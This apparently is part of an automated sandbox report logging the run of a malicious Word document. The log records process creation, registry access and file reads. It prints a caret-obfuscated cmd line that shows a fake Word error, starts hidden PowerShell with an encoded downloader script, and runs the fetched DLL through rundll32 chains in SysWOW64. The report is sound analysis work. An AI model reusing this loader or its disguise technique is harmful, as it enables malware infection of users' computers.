                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....T..............................}..v....XU......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... \......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....\..............................}..v....X]......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............h.{.}.}.$.J.8.2.E.=.(.'.W.'.+.(.'.2.8.'.+.'.L.'.).)......a......0................Hq.....4.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....@b..............................}..v.....b......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v....hi......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... j..............................}..v.....j......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.....o......0.......................r.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....p..............................}..v....(q......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j....0Lq.............................}..v.....t......0................Hq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....pu..............................}..v.....u......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................e!.j....E...............................}..v............0...............H.q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................e!.j....E...............................}..v............0...............H.q.............................
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
